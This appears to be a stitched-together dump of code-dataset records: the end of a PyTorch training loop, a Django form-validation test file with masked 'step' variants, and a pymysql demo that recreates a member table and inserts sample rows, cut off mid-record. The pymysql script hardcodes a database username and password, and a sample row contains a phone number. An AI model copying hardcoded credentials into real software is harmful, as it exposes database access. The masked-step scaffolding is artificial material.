running loss and decay learning rates\n # --------------------------------------------------------------------\n if running_loss > 0.0:\n running_loss = 0.95 * running_loss + 0.05 * batch_loss.item()\n else:\n running_loss = batch_loss.item()\n\n self.optimizer.zero_grad()\n accumulate_batch = 0\n\n self.scheduler.step(global_iteration_step)\n\n global_iteration_step += 1\n # torch.cuda.empty_cache()\n description = \"[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]\".format(\n datetime.utcnow() - train_begin,\n epoch,\n global_iteration_step, running_loss,\n self.optimizer.param_groups[0]['lr'])\n tqdm_batch_iterator.set_description(description)\n\n # tensorboard\n if global_iteration_step % self.hparams.tensorboard_step == 0:\n description = \"[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]\".format(\n datetime.utcnow() - train_begin,\n epoch,\n global_iteration_step, running_loss,\n self.optimizer.param_groups[0]['lr'],\n )\n self._logger.info(description)\n # tensorboard writing scalar\n self.summary_writer.add_scalar(\n \"train/loss\", batch_loss, global_iteration_step\n )\n self.summary_writer.add_scalar(\n \"train/lr\", self.optimizer.param_groups[0][\"lr\"], global_iteration_step\n )\n\n # -------------------------------------------------------------------------\n # ON EPOCH END (checkpointing and validation)\n # -------------------------------------------------------------------------\n self.checkpoint_manager.step(epoch)\n self.previous_model_path = os.path.join(self.checkpoint_manager.ckpt_dirpath, 
\"checkpoint_%d.pth\" % (epoch))\n self._logger.info(self.previous_model_path)\n\n if epoch < self.hparams.num_epochs - 1 and self.hparams.dataset_version == '0.9':\n continue\n\n torch.cuda.empty_cache()\n evaluation.run_evaluate(self.previous_model_path, global_iteration_step, self.summary_writer,\n os.path.join(self.checkpoint_manager.ckpt_dirpath, \"ranks_%d_valid.json\" % epoch))\n torch.cuda.empty_cache()\n\n return self.previous_model_path",
"step-ids": [
4,
6,
7,
8,
10
]
}
|
[
4,
6,
7,
8,
10
] |
from django.test import TestCase
from student.forms import StudentForm
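# Form validation tests for StudentForm: valid input, empty input, missing required fields, and max-value limits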
class ModelTest(TestCase):
def test_expense_form_valid_data(self):
form = StudentForm(data={
'student_id': 500,
'firstName': "Emre",
'lastName': "Tan",
'department': "Panama",
'mathScore': 100,
'physicsScore': 70,
'chemistryScore': 40,
'biologyScore': 10
})
self.assertTrue(form.is_valid())
def test_expense_form_no_data(self):
form = StudentForm(data={})
self.assertFalse(form.is_valid())
self.assertEqual(len(form.errors), 8)
def test_expense_form_invalid_required(self):
form = StudentForm(data={
'student_id': 500,
'firstName': "",
'lastName': "",
'department': "",
'mathScore': 100,
'physicsScore': 70,
'chemistryScore': 40,
'biologyScore': 10
})
self.assertFalse(form.is_valid())
self.assertEqual(len(form.errors), 3)
self.assertEqual(form.errors, {
'firstName': ['This field is required.'],
'lastName': ['This field is required.'],
'department': ['This field is required.']
})
def test_expense_form_invalid_equal_to_max(self):
form = StudentForm(data={
'student_id': 120000,
'firstName': "Berkay",
'lastName': "Tan",
'department': "Bilisim",
'mathScore': 200,
'physicsScore': 150,
'chemistryScore': 150,
'biologyScore': 101
})
self.assertFalse(form.is_valid())
self.assertEqual(len(form.errors), 5)
self.assertEqual(form.errors, {
'student_id': ['Ensure this value is less than or equal to 9999.'],
'mathScore': ['Ensure this value is less than or equal to 100.'],
'physicsScore': ['Ensure this value is less than or equal to 100.'],
'chemistryScore': ['Ensure this value is less than or equal to 100.'],
'biologyScore': ['Ensure this value is less than or equal to 100.'],
})
|
normal
|
{
"blob_id": "6dc7c7de972388f3984a1238a2d62e53c60c622e",
"index": 6252,
"step-1": "<mask token>\n\n\nclass ModelTest(TestCase):\n\n def test_expense_form_valid_data(self):\n form = StudentForm(data={'student_id': 500, 'firstName': 'Emre',\n 'lastName': 'Tan', 'department': 'Panama', 'mathScore': 100,\n 'physicsScore': 70, 'chemistryScore': 40, 'biologyScore': 10})\n self.assertTrue(form.is_valid())\n <mask token>\n\n def test_expense_form_invalid_required(self):\n form = StudentForm(data={'student_id': 500, 'firstName': '',\n 'lastName': '', 'department': '', 'mathScore': 100,\n 'physicsScore': 70, 'chemistryScore': 40, 'biologyScore': 10})\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 3)\n self.assertEqual(form.errors, {'firstName': [\n 'This field is required.'], 'lastName': [\n 'This field is required.'], 'department': [\n 'This field is required.']})\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass ModelTest(TestCase):\n\n def test_expense_form_valid_data(self):\n form = StudentForm(data={'student_id': 500, 'firstName': 'Emre',\n 'lastName': 'Tan', 'department': 'Panama', 'mathScore': 100,\n 'physicsScore': 70, 'chemistryScore': 40, 'biologyScore': 10})\n self.assertTrue(form.is_valid())\n\n def test_expense_form_no_data(self):\n form = StudentForm(data={})\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 8)\n\n def test_expense_form_invalid_required(self):\n form = StudentForm(data={'student_id': 500, 'firstName': '',\n 'lastName': '', 'department': '', 'mathScore': 100,\n 'physicsScore': 70, 'chemistryScore': 40, 'biologyScore': 10})\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 3)\n self.assertEqual(form.errors, {'firstName': [\n 'This field is required.'], 'lastName': [\n 'This field is required.'], 'department': [\n 'This field is required.']})\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass ModelTest(TestCase):\n\n def test_expense_form_valid_data(self):\n form = StudentForm(data={'student_id': 500, 'firstName': 'Emre',\n 'lastName': 'Tan', 'department': 'Panama', 'mathScore': 100,\n 'physicsScore': 70, 'chemistryScore': 40, 'biologyScore': 10})\n self.assertTrue(form.is_valid())\n\n def test_expense_form_no_data(self):\n form = StudentForm(data={})\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 8)\n\n def test_expense_form_invalid_required(self):\n form = StudentForm(data={'student_id': 500, 'firstName': '',\n 'lastName': '', 'department': '', 'mathScore': 100,\n 'physicsScore': 70, 'chemistryScore': 40, 'biologyScore': 10})\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 3)\n self.assertEqual(form.errors, {'firstName': [\n 'This field is required.'], 'lastName': [\n 'This field is required.'], 'department': [\n 'This field is required.']})\n\n def test_expense_form_invalid_equal_to_max(self):\n form = StudentForm(data={'student_id': 120000, 'firstName':\n 'Berkay', 'lastName': 'Tan', 'department': 'Bilisim',\n 'mathScore': 200, 'physicsScore': 150, 'chemistryScore': 150,\n 'biologyScore': 101})\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 5)\n self.assertEqual(form.errors, {'student_id': [\n 'Ensure this value is less than or equal to 9999.'],\n 'mathScore': ['Ensure this value is less than or equal to 100.'\n ], 'physicsScore': [\n 'Ensure this value is less than or equal to 100.'],\n 'chemistryScore': [\n 'Ensure this value is less than or equal to 100.'],\n 'biologyScore': [\n 'Ensure this value is less than or equal to 100.']})\n",
"step-4": "from django.test import TestCase\nfrom student.forms import StudentForm\n\n\nclass ModelTest(TestCase):\n\n def test_expense_form_valid_data(self):\n form = StudentForm(data={'student_id': 500, 'firstName': 'Emre',\n 'lastName': 'Tan', 'department': 'Panama', 'mathScore': 100,\n 'physicsScore': 70, 'chemistryScore': 40, 'biologyScore': 10})\n self.assertTrue(form.is_valid())\n\n def test_expense_form_no_data(self):\n form = StudentForm(data={})\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 8)\n\n def test_expense_form_invalid_required(self):\n form = StudentForm(data={'student_id': 500, 'firstName': '',\n 'lastName': '', 'department': '', 'mathScore': 100,\n 'physicsScore': 70, 'chemistryScore': 40, 'biologyScore': 10})\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 3)\n self.assertEqual(form.errors, {'firstName': [\n 'This field is required.'], 'lastName': [\n 'This field is required.'], 'department': [\n 'This field is required.']})\n\n def test_expense_form_invalid_equal_to_max(self):\n form = StudentForm(data={'student_id': 120000, 'firstName':\n 'Berkay', 'lastName': 'Tan', 'department': 'Bilisim',\n 'mathScore': 200, 'physicsScore': 150, 'chemistryScore': 150,\n 'biologyScore': 101})\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 5)\n self.assertEqual(form.errors, {'student_id': [\n 'Ensure this value is less than or equal to 9999.'],\n 'mathScore': ['Ensure this value is less than or equal to 100.'\n ], 'physicsScore': [\n 'Ensure this value is less than or equal to 100.'],\n 'chemistryScore': [\n 'Ensure this value is less than or equal to 100.'],\n 'biologyScore': [\n 'Ensure this value is less than or equal to 100.']})\n",
"step-5": "from django.test import TestCase\nfrom student.forms import StudentForm\n\n\nclass ModelTest(TestCase):\n\n def test_expense_form_valid_data(self):\n form = StudentForm(data={\n 'student_id': 500,\n 'firstName': \"Emre\",\n 'lastName': \"Tan\",\n 'department': \"Panama\",\n 'mathScore': 100,\n 'physicsScore': 70,\n 'chemistryScore': 40,\n 'biologyScore': 10\n })\n\n self.assertTrue(form.is_valid())\n\n def test_expense_form_no_data(self):\n form = StudentForm(data={})\n\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 8)\n\n def test_expense_form_invalid_required(self):\n form = StudentForm(data={\n 'student_id': 500,\n 'firstName': \"\",\n 'lastName': \"\",\n 'department': \"\",\n 'mathScore': 100,\n 'physicsScore': 70,\n 'chemistryScore': 40,\n 'biologyScore': 10\n })\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 3)\n self.assertEqual(form.errors, {\n 'firstName': ['This field is required.'],\n 'lastName': ['This field is required.'],\n 'department': ['This field is required.']\n })\n\n def test_expense_form_invalid_equal_to_max(self):\n form = StudentForm(data={\n 'student_id': 120000,\n 'firstName': \"Berkay\",\n 'lastName': \"Tan\",\n 'department': \"Bilisim\",\n 'mathScore': 200,\n 'physicsScore': 150,\n 'chemistryScore': 150,\n 'biologyScore': 101\n })\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 5)\n self.assertEqual(form.errors, {\n 'student_id': ['Ensure this value is less than or equal to 9999.'],\n 'mathScore': ['Ensure this value is less than or equal to 100.'],\n 'physicsScore': ['Ensure this value is less than or equal to 100.'],\n 'chemistryScore': ['Ensure this value is less than or equal to 100.'],\n 'biologyScore': ['Ensure this value is less than or equal to 100.'],\n })\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import pymysql
def testeSelect(db):
	# Create a query cursor
cur1 = db.cursor()
	# Run the SQL query with the execute() method
cur1.execute("SELECT VERSION()")
	# Fetch a single row with the fetchone() method
data = cur1.fetchone()
print(dir(data))
print ("cur1 : %s " % cur1)
print ("Database version : %s " % data)
def dropTable(db):
	# Create a query cursor
cur1 = db.cursor()
cur1.execute("drop table if exists python_demo")
print('dropTable',cur1)
def createTable(db):
	# Create a query cursor
cur1 = db.cursor()
sql = '''
CREATE TABLE IF NOT EXISTS python_demo (
MEMBER_ID INT(20) NOT NULL AUTO_INCREMENT COMMENT '会员ID',
MEMBER_CODE VARCHAR(20) NOT NULL COMMENT '会员代码',
MEMBER_NAME VARCHAR(128) NOT NULL COMMENT '公司中文名称',
MEMBER_NAME_SHORT VARCHAR(128) NULL DEFAULT NULL COMMENT '公司简称',
COMPANY_NAME_EN VARCHAR(128) NULL DEFAULT NULL COMMENT '公司英文名称',
REG_PLACE VARCHAR(20) NULL DEFAULT NULL COMMENT '公司注册地址',
REG_ADDRESS VARCHAR(128) NULL DEFAULT NULL COMMENT '公司注册地址',
ENT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '公司性质',
REGCAPITAL DOUBLE(12,2) NULL DEFAULT NULL COMMENT '注册资本',
REG_CURRENCY VARCHAR(20) NULL DEFAULT NULL COMMENT '注册资本币种',
JUDICIAL_PERSON VARCHAR(32) NULL DEFAULT NULL COMMENT '法人名称',
BUSINESS_SCOPE VARCHAR(128) NULL DEFAULT NULL COMMENT '公司经营范围',
COM_TEL VARCHAR(20) NULL DEFAULT NULL COMMENT '公司电话',
COM_FAX VARCHAR(64) NULL DEFAULT NULL COMMENT '公司传真',
PERSON_INCHARGE VARCHAR(64) NULL DEFAULT NULL COMMENT '公司负责人',
ZIP_CODE VARCHAR(6) NULL DEFAULT NULL COMMENT '邮编',
CON_NAME VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人姓名',
CON_MOBILE VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人手机',
CON_EMAIL VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人邮箱',
CON_FAX VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人传真',
CON_CERT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人证件类型',
CON_CERT_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人证件号',
CON_CERT_DATE DATE NULL DEFAULT NULL COMMENT '联系人证件失效时间',
CON_CER1_ID INT(20) NULL DEFAULT NULL COMMENT '联系人身份证正面ID',
CON_CER2_ID INT(20) NULL DEFAULT NULL COMMENT '联系人身份证反面ID',
THERECER_INTGRATED VARCHAR(20) NULL DEFAULT NULL COMMENT '三证合一标志',
BIZLIC_ID INT(20) NULL DEFAULT NULL COMMENT '营业执照ID',
BIZLIC_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '营业执照代码',
BIZLIC_DATE DATE NULL DEFAULT NULL COMMENT '营业执照失效时间',
TAXREGISTER_ID INT(20) NULL DEFAULT NULL COMMENT '税务等级证书ID',
TAXREGISTER_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '税务登记号',
TAXREGISTER_DATE DATE NULL DEFAULT NULL COMMENT '税务登记失效时间',
ORGREG_ID INT(20) NULL DEFAULT NULL COMMENT '组织机构代码证ID',
ORGREG_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '组织机构代码',
ORGREG_DATE DATE NULL DEFAULT NULL COMMENT '组织机构失效时间',
BANK_ID INT(20) NULL DEFAULT NULL COMMENT '银行开户许可证ID',
BANK_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '开户银行类别',
BANK_DEPOSIT VARCHAR(128) NULL DEFAULT NULL COMMENT '开户银行',
BANK_DEPOSIT_CODE VARCHAR(32) NULL DEFAULT NULL COMMENT '开户银行编码',
BANK_ACCOUNTNO VARCHAR(32) NULL DEFAULT NULL COMMENT '银行账号',
BANK_HOUSEHOULD VARCHAR(32) NULL DEFAULT NULL COMMENT '银行户主',
INVOICE_TITLE VARCHAR(128) NULL DEFAULT NULL COMMENT '开票台头',
INVOICE_ADDRESS VARCHAR(20) NULL DEFAULT NULL COMMENT '开票地址',
INVOICE_ADDRESS_DT VARCHAR(128) NULL DEFAULT NULL COMMENT '开票详细地址',
APPLY_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '申请审核机构',
BUYER_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '买家标识',
SELLER_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家标识',
THIRD_PART_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '第三方标识',
MAIN_USER_ID INT(20) NULL DEFAULT NULL COMMENT '主账号ID',
MDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDM主数据CODE',
ERP_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ERP会员CODE',
REG_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '注册类型',
STATUS VARCHAR(20) NULL DEFAULT NULL COMMENT '会员状态',
AUDITOR VARCHAR(128) NULL DEFAULT NULL COMMENT '审核人',
AUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT '审核时间',
AUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT '审核结果',
AUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT '审核意见',
MDM_AUDITOR VARCHAR(32) NULL DEFAULT NULL COMMENT 'MDM审核人',
MDM_AUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT 'MDM审核时间',
MDM_AUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT 'MDM审核意见',
MDM_AUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDM审核结果',
MEMBER_CHG_ID INT(20) NULL DEFAULT NULL COMMENT '变更ID',
CHANGE_STATUS VARCHAR(20) NULL DEFAULT NULL COMMENT '变更状态',
ALIVE_FLAG VARCHAR(1) NOT NULL COMMENT '当前有效状态',
LANG_VER VARCHAR(10) NULL DEFAULT NULL COMMENT '语言类型',
CREATE_USER INT(20) NOT NULL COMMENT '创建者',
CREATE_DATE DATETIME NOT NULL COMMENT '创建时间',
UPDATE_USER INT(20) NULL DEFAULT NULL COMMENT '修改者',
UPDATE_DATE DATETIME NULL DEFAULT NULL COMMENT '修改时间',
DELETE_USER INT(20) NULL DEFAULT NULL COMMENT '删除者',
DELETE_DATE DATETIME NULL DEFAULT NULL COMMENT '删除时间',
BUYER_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '买家类型(01:个人买家;02:公司买家)',
AUDIT_OPTION_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '审核身份标识(01:平台;02:卖家)',
AUDIT_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '审核卖家ID(当审核身份标识为卖家审核时,审核的卖家ID)',
SELLER_MDM VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家MDM系统',
SELLER_SAP VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家SAP系统',
SELLER_MDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家MDM系统数据CODE',
IS_PLAT_BLACK VARCHAR(2) NULL DEFAULT NULL COMMENT '黑名单状态(41:是;0:否)',
INVOCIE_ADDRESS_LEFT3 VARCHAR(10) NULL DEFAULT NULL COMMENT '用户所属区域-省',
INVOCIE_ADDRESS_RIGHT5 VARCHAR(10) NULL DEFAULT NULL COMMENT '用户所属区域-市',
PRIMARY KEY (MEMBER_ID)
)
COMMENT='会员信息表'
COLLATE='utf8_general_ci'
ENGINE=InnoDB
'''
cur1.execute(sql)
print('createTabl',cur1)
def selectTable(db):
	# Create a query cursor
cur1 = db.cursor()
cur1.execute("select member_name,MEMBER_CODE,member_id from python_demo limit 10")
	# Use fetchall() to receive all returned result rows
data = cur1.fetchall()
for index,item in enumerate(data):
print(index,sep=' ', end=' ')
for index2,item2 in enumerate(item):
print(item2,sep=' ', end=' ')
print("")
def insertTable(db):
	# Create a query cursor
cur1 = db.cursor()
cur1.execute("INSERT INTO python_demo (MEMBER_CODE, MEMBER_NAME, MEMBER_NAME_SHORT, COMPANY_NAME_EN, REG_PLACE, REG_ADDRESS, ENT_TYPE, REGCAPITAL, REG_CURRENCY, JUDICIAL_PERSON, BUSINESS_SCOPE, COM_TEL, COM_FAX, PERSON_INCHARGE, ZIP_CODE, CON_NAME, CON_MOBILE, CON_EMAIL, CON_FAX, CON_CERT_TYPE, CON_CERT_NO, CON_CERT_DATE, CON_CER1_ID, CON_CER2_ID, THERECER_INTGRATED, BIZLIC_ID, BIZLIC_NO, BIZLIC_DATE, TAXREGISTER_ID, TAXREGISTER_NO, TAXREGISTER_DATE, ORGREG_ID, ORGREG_NO, ORGREG_DATE, BANK_ID, BANK_TYPE, BANK_DEPOSIT, BANK_DEPOSIT_CODE, BANK_ACCOUNTNO, BANK_HOUSEHOULD, INVOICE_TITLE, INVOICE_ADDRESS, INVOICE_ADDRESS_DT, APPLY_SELLER_ID, BUYER_FLAG, SELLER_FLAG, THIRD_PART_FLAG, MAIN_USER_ID, MDM_DATA_CODE, ERP_DATA_CODE, REG_TYPE, STATUS, AUDITOR, AUDIT_DATE, AUDIT_RESULT, AUDIT_OPINION, MDM_AUDITOR, MDM_AUDIT_DATE, MDM_AUDIT_OPINION, MDM_AUDIT_RESULT, MEMBER_CHG_ID, CHANGE_STATUS, ALIVE_FLAG, LANG_VER, CREATE_USER, CREATE_DATE, UPDATE_USER, UPDATE_DATE, DELETE_USER, DELETE_DATE, BUYER_TYPE, AUDIT_OPTION_FLAG, AUDIT_SELLER_ID, SELLER_MDM, SELLER_SAP, SELLER_MDM_DATA_CODE, IS_PLAT_BLACK, INVOCIE_ADDRESS_LEFT3, INVOCIE_ADDRESS_RIGHT5) VALUES ('A000001', '中国有限公司', '中国有限公司', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'xinming', '15136378930', NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', '1', '0', 2, 'M0000001', '00M0000001', '10', '01', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 2, '01', '1', 'ZH-CN', 179143, '2016-05-28 12:16:23', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL)")
	# cursor.rowcount (an attribute, not a method) holds the number of affected rows
	#data = cur1.rowcount
	#print('insertTable',data)
# Open the database connection (pymysql expects lowercase charset names such as 'utf8')
db = pymysql.connect(host='127.0.0.1',user='pu3147',
		password='1qaz@WSX',database='demo',port=3306,charset='utf8')
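# Demo driver: recreate the table, insert five sample rows, then run the version check and a sample query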
dropTable(db)
createTable(db)
insertTable(db)
insertTable(db)
insertTable(db)
insertTable(db)
insertTable(db)
testeSelect(db)
selectTable(db)
# Commit the inserts (pymysql does not autocommit by default), then close the connection
db.commit()
db.close()
|
normal
|
{
"blob_id": "75133dd924f8f3f028075c5d2109bb79ddc7fe87",
"index": 434,
"step-1": "<mask token>\n\n\ndef testeSelect(db):\n cur1 = db.cursor()\n cur1.execute('SELECT VERSION()')\n data = cur1.fetchone()\n print(dir(data))\n print('cur1 : %s ' % cur1)\n print('Database version : %s ' % data)\n\n\ndef dropTable(db):\n cur1 = db.cursor()\n cur1.execute('drop table if exists python_demo')\n print('dropTable', cur1)\n\n\ndef createTable(db):\n cur1 = db.cursor()\n sql = \"\"\"\n\t\t\tCREATE TABLE IF NOT EXISTS python_demo (\n\t\t\t\tMEMBER_ID INT(20) NOT NULL AUTO_INCREMENT COMMENT '会员ID',\n\t\t\t\tMEMBER_CODE VARCHAR(20) NOT NULL COMMENT '会员代码',\n\t\t\t\tMEMBER_NAME VARCHAR(128) NOT NULL COMMENT '公司中文名称',\n\t\t\t\tMEMBER_NAME_SHORT VARCHAR(128) NULL DEFAULT NULL COMMENT '公司简称',\n\t\t\t\tCOMPANY_NAME_EN VARCHAR(128) NULL DEFAULT NULL COMMENT '公司英文名称',\n\t\t\t\tREG_PLACE VARCHAR(20) NULL DEFAULT NULL COMMENT '公司注册地址',\n\t\t\t\tREG_ADDRESS VARCHAR(128) NULL DEFAULT NULL COMMENT '公司注册地址',\n\t\t\t\tENT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '公司性质',\n\t\t\t\tREGCAPITAL DOUBLE(12,2) NULL DEFAULT NULL COMMENT '注册资本',\n\t\t\t\tREG_CURRENCY VARCHAR(20) NULL DEFAULT NULL COMMENT '注册资本币种',\n\t\t\t\tJUDICIAL_PERSON VARCHAR(32) NULL DEFAULT NULL COMMENT '法人名称',\n\t\t\t\tBUSINESS_SCOPE VARCHAR(128) NULL DEFAULT NULL COMMENT '公司经营范围',\n\t\t\t\tCOM_TEL VARCHAR(20) NULL DEFAULT NULL COMMENT '公司电话',\n\t\t\t\tCOM_FAX VARCHAR(64) NULL DEFAULT NULL COMMENT '公司传真',\n\t\t\t\tPERSON_INCHARGE VARCHAR(64) NULL DEFAULT NULL COMMENT '公司负责人',\n\t\t\t\tZIP_CODE VARCHAR(6) NULL DEFAULT NULL COMMENT '邮编',\n\t\t\t\tCON_NAME VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人姓名',\n\t\t\t\tCON_MOBILE VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人手机',\n\t\t\t\tCON_EMAIL VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人邮箱',\n\t\t\t\tCON_FAX VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人传真',\n\t\t\t\tCON_CERT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人证件类型',\n\t\t\t\tCON_CERT_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人证件号',\n\t\t\t\tCON_CERT_DATE DATE NULL DEFAULT NULL COMMENT '联系人证件失效时间',\n\t\t\t\tCON_CER1_ID INT(20) NULL DEFAULT NULL COMMENT '联系人身份证正面ID',\n\t\t\t\tCON_CER2_ID INT(20) NULL DEFAULT NULL COMMENT '联系人身份证反面ID',\n\t\t\t\tTHERECER_INTGRATED VARCHAR(20) NULL DEFAULT NULL COMMENT '三证合一标志',\n\t\t\t\tBIZLIC_ID INT(20) NULL DEFAULT NULL COMMENT '营业执照ID',\n\t\t\t\tBIZLIC_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '营业执照代码',\n\t\t\t\tBIZLIC_DATE DATE NULL DEFAULT NULL COMMENT '营业执照失效时间',\n\t\t\t\tTAXREGISTER_ID INT(20) NULL DEFAULT NULL COMMENT '税务等级证书ID',\n\t\t\t\tTAXREGISTER_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '税务登记号',\n\t\t\t\tTAXREGISTER_DATE DATE NULL DEFAULT NULL COMMENT '税务登记失效时间',\n\t\t\t\tORGREG_ID INT(20) NULL DEFAULT NULL COMMENT '组织机构代码证ID',\n\t\t\t\tORGREG_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '组织机构代码',\n\t\t\t\tORGREG_DATE DATE NULL DEFAULT NULL COMMENT '组织机构失效时间',\n\t\t\t\tBANK_ID INT(20) NULL DEFAULT NULL COMMENT '银行开户许可证ID',\n\t\t\t\tBANK_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '开户银行类别',\n\t\t\t\tBANK_DEPOSIT VARCHAR(128) NULL DEFAULT NULL COMMENT '开户银行',\n\t\t\t\tBANK_DEPOSIT_CODE VARCHAR(32) NULL DEFAULT NULL COMMENT '开户银行编码',\n\t\t\t\tBANK_ACCOUNTNO VARCHAR(32) NULL DEFAULT NULL COMMENT '银行账号',\n\t\t\t\tBANK_HOUSEHOULD VARCHAR(32) NULL DEFAULT NULL COMMENT '银行户主',\n\t\t\t\tINVOICE_TITLE VARCHAR(128) NULL DEFAULT NULL COMMENT '开票台头',\n\t\t\t\tINVOICE_ADDRESS VARCHAR(20) NULL DEFAULT NULL COMMENT '开票地址',\n\t\t\t\tINVOICE_ADDRESS_DT VARCHAR(128) NULL DEFAULT NULL COMMENT '开票详细地址',\n\t\t\t\tAPPLY_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '申请审核机构',\n\t\t\t\tBUYER_FLAG VARCHAR(20) NULL 
DEFAULT NULL COMMENT '买家标识',\n\t\t\t\tSELLER_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家标识',\n\t\t\t\tTHIRD_PART_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '第三方标识',\n\t\t\t\tMAIN_USER_ID INT(20) NULL DEFAULT NULL COMMENT '主账号ID',\n\t\t\t\tMDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDM主数据CODE',\n\t\t\t\tERP_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ERP会员CODE',\n\t\t\t\tREG_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '注册类型',\n\t\t\t\tSTATUS VARCHAR(20) NULL DEFAULT NULL COMMENT '会员状态',\n\t\t\t\tAUDITOR VARCHAR(128) NULL DEFAULT NULL COMMENT '审核人',\n\t\t\t\tAUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT '审核时间',\n\t\t\t\tAUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT '审核结果',\n\t\t\t\tAUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT '审核意见',\n\t\t\t\tMDM_AUDITOR VARCHAR(32) NULL DEFAULT NULL COMMENT 'MDM审核人',\n\t\t\t\tMDM_AUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT 'MDM审核时间',\n\t\t\t\tMDM_AUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT 'MDM审核意见',\n\t\t\t\tMDM_AUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDM审核结果',\n\t\t\t\tMEMBER_CHG_ID INT(20) NULL DEFAULT NULL COMMENT '变更ID',\n\t\t\t\tCHANGE_STATUS VARCHAR(20) NULL DEFAULT NULL COMMENT '变更状态',\n\t\t\t\tALIVE_FLAG VARCHAR(1) NOT NULL COMMENT '当前有效状态',\n\t\t\t\tLANG_VER VARCHAR(10) NULL DEFAULT NULL COMMENT '语言类型',\n\t\t\t\tCREATE_USER INT(20) NOT NULL COMMENT '创建者',\n\t\t\t\tCREATE_DATE DATETIME NOT NULL COMMENT '创建时间',\n\t\t\t\tUPDATE_USER INT(20) NULL DEFAULT NULL COMMENT '修改者',\n\t\t\t\tUPDATE_DATE DATETIME NULL DEFAULT NULL COMMENT '修改时间',\n\t\t\t\tDELETE_USER INT(20) NULL DEFAULT NULL COMMENT '删除者',\n\t\t\t\tDELETE_DATE DATETIME NULL DEFAULT NULL COMMENT '删除时间',\n\t\t\t\tBUYER_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '买家类型(01:个人买家;02:公司买家)',\n\t\t\t\tAUDIT_OPTION_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '审核身份标识(01:平台;02:卖家)',\n\t\t\t\tAUDIT_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '审核卖家ID(当审核身份标识为卖家审核时,审核的卖家ID)',\n\t\t\t\tSELLER_MDM VARCHAR(20) NULL DEFAULT NULL COMMENT 